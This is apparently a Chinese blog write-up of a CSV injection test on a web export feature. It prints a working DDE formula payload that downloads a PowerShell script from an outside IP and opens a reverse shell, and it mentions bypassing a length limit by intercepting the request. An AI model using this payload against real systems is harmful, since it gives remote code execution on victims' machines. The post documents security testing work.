oxo1 前言
之前看到过 CSV 注入的文章,具体想了解的请搜索学习,这里不多作介绍。今天刚好碰到了导出功能,就随手测试一波,没想到还真的存在 CSV 注入漏洞。
oxo2 经过
1、测试漏洞
看到有导出功能,就新建一个用户,随手插入 Payload
导出 CSV 文件
查看 CSV 文件,发现结果等于 2 ,说明存在漏洞。
2、利用漏洞
这里反弹 shell
就在本地演示好了. 利用 powershell 来进行反弹。(梦哥教我的,梦哥牛逼)
下载:https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 放到网站上。反弹 shell 命令如下:
=1+cmd|' /C powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://172.16.7.64/Invoke-PowerShellTcp.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress 172.16.7.64 -Port 4444 '!A0
尝试输入 payload ,发现长度限制了
发现抓取修改可绕过
导出到本地,我这里在虚拟机使用 office 2010 来打开,同时本机监听 4444 端口
启用
,然后点击是
此时我们就成功反弹 shell
了
oxo3 结束
总体来说这漏洞有点鸡肋,也就只能骗骗只会点 是
的人。如果是您,您这么天资聪颖绝对不会中招的。